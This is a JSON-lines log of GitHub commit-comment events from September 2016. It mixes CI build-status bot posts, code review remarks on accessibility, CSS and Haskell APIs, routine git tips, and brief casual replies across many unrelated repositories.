{"id":"4591391493","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19101239,"position":null,"line":null,"path":null,"commit_id":"ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004","created_at":"2016-09-20T18:03:45Z","updated_at":"2016-09-20T18:03:45Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2339 of 2340 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T18:03:45Z"}
{"id":"4591393321","type":"CommitCommentEvent","actor":{"login":"WhiteLord"},"repo":{"name":"YordanDringov/test-repo"},"payload":{"comment":{"id":19101242,"position":null,"line":null,"path":null,"commit_id":"f0860771a0b95b3484da7543e6cfbb261817dde2","created_at":"2016-09-20T18:04:03Z","updated_at":"2016-09-20T18:04:03Z","body":"good thing"}},"created_at":"2016-09-20T18:04:03Z"}
{"id":"4591394467","type":"CommitCommentEvent","actor":{"login":"behram"},"repo":{"name":"ojs/ojs"},"payload":{"comment":{"id":19101246,"position":null,"line":null,"path":null,"commit_id":"f9df269de2f51d5cdfe932c5ac230d23842d30f8","created_at":"2016-09-20T18:04:14Z","updated_at":"2016-09-20T18:04:14Z","body":"@hmert you are correct i am moving right now. 👍 "}},"created_at":"2016-09-20T18:04:14Z"}
{"id":"4591394925","type":"CommitCommentEvent","actor":{"login":"YordanDringov"},"repo":{"name":"YordanDringov/test-repo"},"payload":{"comment":{"id":19101249,"position":null,"line":null,"path":null,"commit_id":"f0860771a0b95b3484da7543e6cfbb261817dde2","created_at":"2016-09-20T18:04:18Z","updated_at":"2016-09-20T18:04:18Z","body":"yeah"}},"created_at":"2016-09-20T18:04:18Z"}
{"id":"4591395514","type":"CommitCommentEvent","actor":{"login":"charliemitchell"},"repo":{"name":"kraken-io/kraken-node"},"payload":{"comment":{"id":19101251,"position":null,"line":null,"path":null,"commit_id":"bdaf51d3c4406c9563e70a605c9822c213a8b651","created_at":"2016-09-20T18:04:24Z","updated_at":"2016-09-20T18:04:24Z","body":"This sort of feels like it's not fixing the underlying issue. If url is used, and we're sending you JSON, the content type is 'application/json' not 'application/x-www-form-urlencoded'. This is pretty confusing, and should get fixed on the backend. IMHO you should accept 'application/json' for this request, because it is confusing to send json but say it's key/value. (Not everyone is going to use this package)"}},"created_at":"2016-09-20T18:04:24Z"}
{"id":"4591395994","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19101252,"position":null,"line":null,"path":null,"commit_id":"92bcfccfab5365bd1e42990896fb81ba0ef118de","created_at":"2016-09-20T18:04:28Z","updated_at":"2016-09-20T18:04:28Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2291 of 2478 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-92bcfccfab5365bd1e42990896fb81ba0ef118de-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-92bcfccfab5365bd1e42990896fb81ba0ef118de-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.45%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T18:04:28Z"}
{"id":"4591405274","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19101278,"position":null,"line":null,"path":null,"commit_id":"fadd431b7b697167953bd4683232ae398d42f119","created_at":"2016-09-20T18:05:47Z","updated_at":"2016-09-20T18:05:47Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.248.fadd431b7b697167953bd4683232ae398d42f119](http://build.palaso.org/viewLog.html?buildId=76972&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:29"}},"created_at":"2016-09-20T18:05:47Z"}
{"id":"4591412220","type":"CommitCommentEvent","actor":{"login":"shortdawwg"},"repo":{"name":"rovo89/XposedInstaller"},"payload":{"comment":{"id":19101295,"position":null,"line":null,"path":null,"commit_id":"cdb3f47895f5543eca0ff94861f5a98b343213c6","created_at":"2016-09-20T18:06:53Z","updated_at":"2016-09-20T18:06:53Z","body":"Jfje\r\n"}},"created_at":"2016-09-20T18:06:53Z"}
{"id":"4591432739","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19101334,"position":null,"line":null,"path":null,"commit_id":"b1cbe4fb362a32dccaf795fd727e5787d57c66f2","created_at":"2016-09-20T18:09:57Z","updated_at":"2016-09-20T18:09:57Z","body":"Link proposal. \r\nIncludes some ideas from @mikiones implementation, but a lot has been rewritten. \r\n\r\nSource links send to controller links (or storage links). \r\nStorage links send to controller links. \r\nHaulers fill & empty storage links (depending on demand). \r\n\r\nAlso includes a first positioning calculation (for the miner). \r\n\r\nWhat do you think?"}},"created_at":"2016-09-20T18:09:57Z"}
{"id":"4591433756","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19101337,"position":null,"line":null,"path":null,"commit_id":"92bcfccfab5365bd1e42990896fb81ba0ef118de","created_at":"2016-09-20T18:10:06Z","updated_at":"2016-09-20T18:10:06Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-92bcfccfab5365bd1e42990896fb81ba0ef118de-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-20T18:10:06Z"}
{"id":"4591434405","type":"CommitCommentEvent","actor":{"login":"yangsu"},"repo":{"name":"titoBouzout/Tag"},"payload":{"comment":{"id":19101338,"position":null,"line":null,"path":null,"commit_id":"776f5c62f49fc9711726be280245fbc16646dc85","created_at":"2016-09-20T18:10:12Z","updated_at":"2016-09-20T18:10:12Z","body":"Why not use package control?"}},"created_at":"2016-09-20T18:10:12Z"}
{"id":"4591434775","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19101339,"position":null,"line":null,"path":null,"commit_id":"1fc159c58d51fcb0df73bf26266ba2b27e44be8b","created_at":"2016-09-20T18:10:15Z","updated_at":"2016-09-20T18:10:15Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Fwbsyd4qTuCKe7XrnY7fWw"}},"created_at":"2016-09-20T18:10:15Z"}
{"id":"4591435180","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":19101341,"position":null,"line":null,"path":null,"commit_id":"425e825333073388d3e3f6cf4245aede22f3b0af","created_at":"2016-09-20T18:10:18Z","updated_at":"2016-09-20T18:10:18Z","body":"@wheresmyjetpack we need some test cases for this one, specially around different tag combinations."}},"created_at":"2016-09-20T18:10:18Z"}
{"id":"4591437242","type":"CommitCommentEvent","actor":{"login":"nojhamster"},"repo":{"name":"ezpaarse-project/ezpaarse-platforms"},"payload":{"comment":{"id":19101344,"position":null,"line":null,"path":null,"commit_id":"f2087353546cb90021a4069c5094b0b6d942376a","created_at":"2016-09-20T18:10:37Z","updated_at":"2016-09-20T18:10:37Z","body":"Exact, même si pour la peine il n'y a plus de validation sur la cohérence d'autres espacements..."}},"created_at":"2016-09-20T18:10:37Z"}
{"id":"4591438493","type":"CommitCommentEvent","actor":{"login":"Martoon-00"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19101348,"position":52,"line":58,"path":"src/Control/TimeWarp/Timed/MonadTimed.hs","commit_id":"2a2a1450d8e983b7ef4ca56e21e1807a7a3b5285","created_at":"2016-09-20T18:10:49Z","updated_at":"2016-09-20T18:10:49Z","body":"Let `RelativeToNow` define some time point, not relatively to now, but absolute value, basing on current virtual time.\r\nIn such case, in example above `(+) 15` would refer to 10 + 15 = 25µs, `const 15` would refer to 15µs."}},"created_at":"2016-09-20T18:10:49Z"}
{"id":"4591442445","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19101358,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T18:11:22Z","updated_at":"2016-09-20T18:11:22Z","body":"Thus, to process dates from the Gregorian calendar you must use `jd_to_gregorian2` and `gregorian_to_jd2` functions, since they are the only implementation with stable results."}},"created_at":"2016-09-20T18:11:22Z"}
{"id":"4591442579","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19101359,"position":7,"line":90,"path":"SQF/dayz_server/compile/server_updateObject.sqf","commit_id":"a3c3ccc3bfbd709fe21c951372f2e43c8bc54d75","created_at":"2016-09-20T18:11:22Z","updated_at":"2016-09-20T18:11:22Z","body":"This does not cause any issues with door or plot management. Both work fine on 1051 servers with it and I've already tested on 106.\r\n\r\nIt would be extremely wasteful to update every object when the inventory has not changed. I'm pretty sure the hive won't even allow you to do that. You can test yourself by building a safe, adding gear to it, then opening the abort menu. That calls playerSync which in turn calls this function. You will immediately get a 309 error in console and HiveExt.log for the safe inventory. Same issue that was reported by @nigeyuk. After this change I tested again and it worked without error: e2c2a2a "}},"created_at":"2016-09-20T18:11:22Z"}
{"id":"4591444392","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19101360,"position":null,"line":null,"path":null,"commit_id":"efe0b244e4d65889ee08909d1a49847bf5bb8f9e","created_at":"2016-09-20T18:11:38Z","updated_at":"2016-09-20T18:11:38Z","body":"yes:)"}},"created_at":"2016-09-20T18:11:38Z"}
{"id":"4591445142","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"ezpaarse-project/ezpaarse-platforms"},"payload":{"comment":{"id":19101361,"position":null,"line":null,"path":null,"commit_id":"f2087353546cb90021a4069c5094b0b6d942376a","created_at":"2016-09-20T18:11:45Z","updated_at":"2016-09-20T18:11:45Z","body":"Restera la validation de cohérence humaine pour les autre cas.\n\nLe mar. 20 sept. 2016 à 20:10, Yannick Schurter <notifications@github.com>\na écrit :\n\n> Exact, même si pour la peine il n'y a plus de validation sur la cohérence\n> d'autres espacements...\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ezpaarse-project/ezpaarse-platforms/commit/f2087353546cb90021a4069c5094b0b6d942376a#commitcomment-19101344>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAUCNAwX2Xg1p7XfCx4k4p4JC2deBM4Qks5qsCGegaJpZM4KBzR->\n> .\n>\n"}},"created_at":"2016-09-20T18:11:45Z"}
{"id":"4591446526","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19101366,"position":null,"line":null,"path":null,"commit_id":"8aa98e0d80be375991a99493164b6ed7bc23efca","created_at":"2016-09-20T18:11:59Z","updated_at":"2016-09-20T18:11:59Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8aa98e0d80be375991a99493164b6ed7bc23efca-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8aa98e0d80be375991a99493164b6ed7bc23efca-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T18:11:59Z"}
{"id":"4591448719","type":"CommitCommentEvent","actor":{"login":"behram"},"repo":{"name":"ojs/ojs"},"payload":{"comment":{"id":19101371,"position":null,"line":null,"path":null,"commit_id":"f9df269de2f51d5cdfe932c5ac230d23842d30f8","created_at":"2016-09-20T18:12:19Z","updated_at":"2016-09-20T18:12:19Z","body":"@hmert /bin directory is ignored from .gitignore in the project. i moved to /etc/bin directory we storing this type files in there. there is any problem"}},"created_at":"2016-09-20T18:12:19Z"}
{"id":"4591450645","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19101380,"position":null,"line":null,"path":null,"commit_id":"4ffd212c9191b0c55ebab675ca9b7d04724bbbe8","created_at":"2016-09-20T18:12:35Z","updated_at":"2016-09-20T18:12:35Z","body":"What about previously-selected gender?"}},"created_at":"2016-09-20T18:12:35Z"}
{"id":"4591452256","type":"CommitCommentEvent","actor":{"login":"hmert"},"repo":{"name":"ojs/ojs"},"payload":{"comment":{"id":19101385,"position":null,"line":null,"path":null,"commit_id":"f9df269de2f51d5cdfe932c5ac230d23842d30f8","created_at":"2016-09-20T18:12:47Z","updated_at":"2016-09-20T18:12:47Z","body":"LGTM 👍 "}},"created_at":"2016-09-20T18:12:47Z"}
{"id":"4591454066","type":"CommitCommentEvent","actor":{"login":"teubanks"},"repo":{"name":"mandatoryprogrammer/NorthKoreaDNSLeak"},"payload":{"comment":{"id":19101386,"position":null,"line":null,"path":null,"commit_id":"9e83f454c876166a7f6df7cfeb9b395016b79765","created_at":"2016-09-20T18:13:02Z","updated_at":"2016-09-20T18:13:02Z","body":"Wait, so this isn't a message from the future? :trollface: "}},"created_at":"2016-09-20T18:13:02Z"}
{"id":"4591457400","type":"CommitCommentEvent","actor":{"login":"Ekown"},"repo":{"name":"IT-erate/Fourth-Generation-Language---PLM-CRS"},"payload":{"comment":{"id":19101387,"position":null,"line":null,"path":null,"commit_id":"eabd77c070099c5f7fa5917e2e556848472a83a2","created_at":"2016-09-20T18:13:33Z","updated_at":"2016-09-20T18:13:33Z","body":"Lol haha bakit may english translation? HAHA"}},"created_at":"2016-09-20T18:13:33Z"}
{"id":"4591457782","type":"CommitCommentEvent","actor":{"login":"covers1624"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":19101389,"position":null,"line":null,"path":null,"commit_id":"b1341d3ae9b5b0825ca90168151b589a883986fd","created_at":"2016-09-20T18:13:37Z","updated_at":"2016-09-20T18:13:37Z","body":"Ill add all of that to."}},"created_at":"2016-09-20T18:13:37Z"}
{"id":"4591460276","type":"CommitCommentEvent","actor":{"login":"mandatoryprogrammer"},"repo":{"name":"mandatoryprogrammer/NorthKoreaDNSLeak"},"payload":{"comment":{"id":19101394,"position":null,"line":null,"path":null,"commit_id":"9e83f454c876166a7f6df7cfeb9b395016b79765","created_at":"2016-09-20T18:13:58Z","updated_at":"2016-09-20T18:13:58Z","body":"The great leader doesn't want me to tell anyone about my time traveler status."}},"created_at":"2016-09-20T18:13:58Z"}
{"id":"4591460543","type":"CommitCommentEvent","actor":{"login":"JonathanTech"},"repo":{"name":"mandatoryprogrammer/NorthKoreaDNSLeak"},"payload":{"comment":{"id":19101395,"position":null,"line":null,"path":null,"commit_id":"9e83f454c876166a7f6df7cfeb9b395016b79765","created_at":"2016-09-20T18:14:00Z","updated_at":"2016-09-20T18:14:00Z","body":"Time travel confirmed ❓ "}},"created_at":"2016-09-20T18:14:00Z"}
{"id":"4591461197","type":"CommitCommentEvent","actor":{"login":"amitchandan"},"repo":{"name":"rohitshekhar/Inventory-Manegmentt-System"},"payload":{"comment":{"id":19101396,"position":null,"line":null,"path":null,"commit_id":"79aafbd4de4547c83de034e8a4401e5809fc37d3","created_at":"2016-09-20T18:14:06Z","updated_at":"2016-09-20T18:14:06Z","body":"ok"}},"created_at":"2016-09-20T18:14:06Z"}
{"id":"4591461246","type":"CommitCommentEvent","actor":{"login":"olegrjumin"},"repo":{"name":"olegrjumin/Health-App-Calendar-UI"},"payload":{"comment":{"id":19101398,"position":14,"line":387,"path":"js/main.js","commit_id":"0df6f025039729221f0b81095aece70ee5c955a1","created_at":"2016-09-20T18:14:06Z","updated_at":"2016-09-20T18:14:06Z","body":"comment"}},"created_at":"2016-09-20T18:14:06Z"}
{"id":"4591465148","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19101407,"position":null,"line":null,"path":null,"commit_id":"f63415ac5bd9cf71b2db3e060252be413a2a3309","created_at":"2016-09-20T18:14:39Z","updated_at":"2016-09-20T18:14:39Z","body":"`git fetch && git rebase origin/master` обновляет локальный репозиторий и накладывает твои локальные коммиты поверх новых с сервера"}},"created_at":"2016-09-20T18:14:39Z"}
{"id":"4591468130","type":"CommitCommentEvent","actor":{"login":"lhizzie"},"repo":{"name":"hitwe/Cont"},"payload":{"comment":{"id":19101411,"position":null,"line":null,"path":null,"commit_id":"0ab0f3b3fcb9d3c4c671df5e97246ca4909d2443","created_at":"2016-09-20T18:15:07Z","updated_at":"2016-09-20T18:15:07Z","body":"Can somebody please help me how to login my hitwe account again using the account kit. I dont know how to use account kit...pls help me i need my hitwe account..."}},"created_at":"2016-09-20T18:15:07Z"}
{"id":"4591473107","type":"CommitCommentEvent","actor":{"login":"Martoon-00"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19101415,"position":14,"line":108,"path":"src/Control/TimeWarp/Rpc/MonadRpc.hs","commit_id":"82fc95372fea421c860deb976d7141ef6168cffb","created_at":"2016-09-20T18:15:51Z","updated_at":"2016-09-20T18:15:51Z","body":"Because it's applied to following 6 functions.\r\nHowever, those functions and this comment are placed into different module in later commit"}},"created_at":"2016-09-20T18:15:51Z"}
{"id":"4591479613","type":"CommitCommentEvent","actor":{"login":"summerMocha"},"repo":{"name":"summerMocha/rainbow-poet-new"},"payload":{"comment":{"id":19101436,"position":null,"line":null,"path":null,"commit_id":"1d95ffe34a9c40e1d6008e05a1457f961889b313","created_at":"2016-09-20T18:16:50Z","updated_at":"2016-09-20T18:16:50Z","body":"adding poines\r\n"}},"created_at":"2016-09-20T18:16:50Z"}
{"id":"4591483891","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19101441,"position":null,"line":null,"path":null,"commit_id":"dc69c7f6c1b81b20785c13b67ab63d280213b2af","created_at":"2016-09-20T18:17:26Z","updated_at":"2016-09-20T18:17:26Z","body":"Hehe, a hot potato. (I think this really is the right way to do it though.)"}},"created_at":"2016-09-20T18:17:26Z"}
{"id":"4591485366","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19101445,"position":null,"line":null,"path":"demo/demo.js","commit_id":"b99185e0f1c6edd6d930f57e95ec93c3cf8261f0","created_at":"2016-09-20T18:17:40Z","updated_at":"2016-09-20T18:17:40Z","body":"On the HTML of the slider currently:\r\n```\r\n      <span>\r\n        <label id=\"slider-label\">\r\n        Hidden slider label<br/>\r\n\r\n        <input type=\"range\" id=\"numInput\"\r\n        min=\"0\"\r\n        max=\"100\"\r\n        value={this.state.value}\r\n        aria-valuemin=\"0\"\r\n        aria-valuemax=\"100\"\r\n        aria-valuenow={this.state.value}\r\n        onChange={(e) => this.updateSliderValue(e)}\r\n        aria-labelledby=\"slider-label\" tabindex=\"0\" />\r\n\r\n        </label>\r\n      </span>\r\n```\r\n\r\nA few notes.\r\nOne is that, while it is valid per the HTML spec and has been since forever, there are practical problems with implicit (wraparound) labels. I'm a bad person for referencing myself to back myself up but:\r\nhttp://webaim.org/discussion/mail_thread?thread=7458\r\n(where 1 person found VoiceOver not announcing the labels, another person found problems with Android's screen reader TalkBack & Chrome, and I list the past (but fixed) and 1 known current problem with implicit labels).\r\n\r\nSecond, we can't have both an implicit label along with aria-labelledby, as you can't label yourself with other parts of yourself. No aria-incest: the labelledby thing has to be a separate, non-parent non-child element.\r\n\r\nSince you're using a real input, the label is a real label, so instead of aria-labelledby, the usual htmlFor and matching id attributes is the better way to go. The made-from-scratch sliders, being made of divs, aren't considered \"labellable\" elements so it wouldn't work as it does for an HTML input, which is why I had it listed in the to-dos on the Jira issue. Because of reason #1, I recommend having the label explicit (separate). This also allows you/the consumer to add our Elements class \"pe-sr-only\" for hiding the label visually.\r\n\r\nThird: Tabindex should not be required for an input. Was there an issue with focus? (My original point about adding the tabindex in the Jira issue was assuming this slider would be built entirely out of non-semantic elements like divs and spans. Using an actual input as you did saves a lot of work. You should be able to remove this).\r\n\r\nFourth: There are times when a slider is representing a textual value, or a value with a particular unit (%, cm, \"footballs\", whatever). On made-from-scratch sliders, there is an (optional) additional value called aria-valuetext, which holds a string which would replace the aria-valuenow being announced (you still keep valuenow, but users would hear valuetext instead). \r\nHas PDA decided not to allow sliders with units or texts as visible user-oriented values? If so, then things are okay as-is, but if not, then the Internationalisation would need to be added back in, for translating these strings for the consuming team. Also, for that matter, translating label texts. I'm not sure how PDA is doing that though."}},"created_at":"2016-09-20T18:17:40Z"}
{"id":"4591486311","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19101446,"position":null,"line":null,"path":null,"commit_id":"8aa98e0d80be375991a99493164b6ed7bc23efca","created_at":"2016-09-20T18:17:49Z","updated_at":"2016-09-20T18:17:49Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8aa98e0d80be375991a99493164b6ed7bc23efca-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-20T18:17:49Z"}
{"id":"4591496116","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19101468,"position":null,"line":null,"path":null,"commit_id":"5fead23a3296e74146551d8a71a257b757460817","created_at":"2016-09-20T18:19:17Z","updated_at":"2016-09-20T18:19:17Z","body":"Why did you not delete the wesnothd_connection if it's no longer needed? :|"}},"created_at":"2016-09-20T18:19:17Z"}
{"id":"4591497588","type":"CommitCommentEvent","actor":{"login":"fvasseur"},"repo":{"name":"Rekyt/divr"},"payload":{"comment":{"id":19101469,"position":null,"line":null,"path":null,"commit_id":"a2214e99c56c8df0bf472a60c156c1d0fbd1102f","created_at":"2016-09-20T18:19:31Z","updated_at":"2016-09-20T18:19:31Z","body":"Merci Matthias !\n\nJe ne sais pas si je vais en avoir l'utilisation dans l'immédiat mais \nc'est bon à savoir !\n\nA+\n\nFrançois\n\n\nLe 20/09/16 à 17:01, Matthias Grenié a écrit :\n>\n> @pierredenelle <https://github.com/pierredenelle> @jsegrestin \n> <https://github.com/jsegrestin> @fvasseur \n> <https://github.com/fvasseur> Hey, just to notify you that I updated \n> docs of the functions using |roxygen| so we can now follow |roxygen| \n> documentation for functions see here: http://r-pkgs.had.co.nz/man.html\n> Basically you just have to run |devtools::document()| after modifying \n> the docs and it will rewrite the |NAMESPACE|file ;)\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/Rekyt/divr/commit/a2214e99c56c8df0bf472a60c156c1d0fbd1102f#commitcomment-19097764>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AUMy16pkNF5mKK4SujUxiFpelzR_ERnTks5qr_U5gaJpZM4KBvGO>.\n>\n\n"}},"created_at":"2016-09-20T18:19:31Z"}
{"id":"4591499065","type":"CommitCommentEvent","actor":{"login":"bengott"},"repo":{"name":"xavcz/apollo-cookie-clicker"},"payload":{"comment":{"id":19101474,"position":null,"line":null,"path":null,"commit_id":"8b873ac313c4cd7f04bd0871bb6f7a0b17bc9b45","created_at":"2016-09-20T18:19:44Z","updated_at":"2016-09-20T18:19:44Z","body":"Looks like you forgot to commit the .meteor/packages file?"}},"created_at":"2016-09-20T18:19:44Z"}
{"id":"4591502089","type":"CommitCommentEvent","actor":{"login":"Eilhart"},"repo":{"name":"AliceCA/Overchan-Android"},"payload":{"comment":{"id":19101481,"position":null,"line":null,"path":null,"commit_id":"b0c80b4381b4afbe0d374aff89400681bd7d37a0","created_at":"2016-09-20T18:20:13Z","updated_at":"2016-09-20T18:20:13Z","body":"Changed extension in `attachment.path` breaks non-jpg files."}},"created_at":"2016-09-20T18:20:13Z"}
{"id":"4591502903","type":"CommitCommentEvent","actor":{"login":"sdillingham"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19101483,"position":110,"line":43,"path":"src/css/layout/_grids.scss","commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-20T18:20:20Z","updated_at":"2016-09-20T18:20:20Z","body":"`margin-left` should appear alphabetically above `margin-right`."}},"created_at":"2016-09-20T18:20:20Z"}
{"id":"4591503521","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19101484,"position":null,"line":null,"path":null,"commit_id":"0ce3399fcb4e4cf2419d00cc845be3f5b5639c6b","created_at":"2016-09-20T18:20:26Z","updated_at":"2016-09-20T18:20:26Z","body":"`git pull`\r\n`git checkout -b temp-branch master`\r\n`git pull https://github.com/OwnageIsMagic/VkOpt.git`\r\n`git checkout master`\r\n`git cherry-pick <commit_hash>`"}},"created_at":"2016-09-20T18:20:26Z"}
{"id":"4591503733","type":"CommitCommentEvent","actor":{"login":"Augstust"},"repo":{"name":"Augstust/EC601HW-1"},"payload":{"comment":{"id":19101486,"position":null,"line":null,"path":null,"commit_id":"98e2c6673e5127ce9a8948aca559327773be0ae1","created_at":"2016-09-20T18:20:28Z","updated_at":"2016-09-20T18:20:28Z","body":"Change Pending Image"}},"created_at":"2016-09-20T18:20:28Z"}
{"id":"4591503774","type":"CommitCommentEvent","actor":{"login":"sdillingham"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19101487,"position":95,"line":32,"path":"src/css/layout/_grids.scss","commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-20T18:20:29Z","updated_at":"2016-09-20T18:20:29Z","body":"`padding-left` should appear alphabetically above `padding-right`."}},"created_at":"2016-09-20T18:20:29Z"}
{"id":"4591505101","type":"CommitCommentEvent","actor":{"login":"zebapy"},"repo":{"name":"sindresorhus/caprine"},"payload":{"comment":{"id":19101492,"position":15,"line":200,"path":"browser.js","commit_id":"2415e8d93bb505e5fd0b901f4e4d0ee3df1e7a33","created_at":"2016-09-20T18:20:40Z","updated_at":"2016-09-20T18:20:40Z","body":"@sindresorhus removing shift check here and meta check above broke stuff. Now when you type a number, it'll jump convo ❗ "}},"created_at":"2016-09-20T18:20:40Z"}
{"id":"4591506707","type":"CommitCommentEvent","actor":{"login":"sdillingham"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19101501,"position":86,"line":26,"path":"src/css/layout/_grids.scss","commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-20T18:20:55Z","updated_at":"2016-09-20T18:20:55Z","body":"I don't think we'll ever have a grid that isn't fluid, so I wonder whether we really need this modifier?"}},"created_at":"2016-09-20T18:20:55Z"}
{"id":"4591509255","type":"CommitCommentEvent","actor":{"login":"smeroni68"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19101504,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T18:21:17Z","updated_at":"2016-09-20T18:21:17Z","body":"Posted on XDA for CDMA and USC users for testing..."}},"created_at":"2016-09-20T18:21:17Z"}
{"id":"4591514299","type":"CommitCommentEvent","actor":{"login":"kasperp"},"repo":{"name":"kasperp/eslint-bot"},"payload":{"comment":{"id":19101515,"position":6,"line":null,"path":"config.js","commit_id":"3c2ec51d03f13a975ce57b0d90c1e1ba935241dc","created_at":"2016-09-20T18:22:02Z","updated_at":"2016-09-20T18:22:02Z","body":"**Eslint**: Parsing error: Illegal export declaration"}},"created_at":"2016-09-20T18:22:02Z"}
